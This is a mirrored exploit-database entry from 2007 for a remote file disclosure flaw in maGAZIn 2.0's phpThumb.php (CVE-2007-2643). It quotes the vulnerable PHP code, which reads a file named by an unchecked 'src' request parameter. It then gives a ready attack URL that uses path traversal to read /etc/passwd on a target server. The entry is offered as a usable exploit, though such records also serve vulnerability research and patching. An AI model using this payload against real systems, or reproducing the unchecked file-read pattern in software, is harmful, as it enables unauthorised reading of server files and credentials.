[] NeoSense
E X P L O I T S
title author type platform port cve id

maGAZIn 2.0 - 'PHPThumb.php?src' Remote File Disclosure

Author: Dj7xpl
type: webapps
platform: php
port: 
date_added: 2007-05-10 
date_updated:  
verified: 1 
codes: OSVDB-36016;CVE-2007-2643 
tags: 
aliases:  
screenshot_url:  
application_url: 
        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[   Dj7xpl@yahoo.com   ]
[    Dj7xpl.2600.ir    ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

---------------------------------------------------------------------

[!] Portal   :   maGAZIn v2.0
[!] Download :   http://www.pinkcrow.net/Scripts/gallery.php
[!] Type     :   Remote File Disclosure Vulnerability

---------------------------------------------------------------------

---------------------------------------------------------------------

Vuln Code :  Line (152 - 157)

[Code]
if ($fp = @fopen($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 'rb')) {
		$OriginalImageData = fread($fp, filesize($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src']));
		fclose($fp);
	} else {
		ErrorImage('cannot open '.$_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 400, 50);
	}
[/Code]

---------------------------------------------------------------------

---------------------------------------------------------------------

Bug :

http://[Target]/[Path]/phpThumb.php?src=[Local File]

Example :

http://Target.ir/Gallery/phpThumb.php?src=../../../etc/passwd

---------------------------------------------------------------------

# milw0rm.com [2007-05-11]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.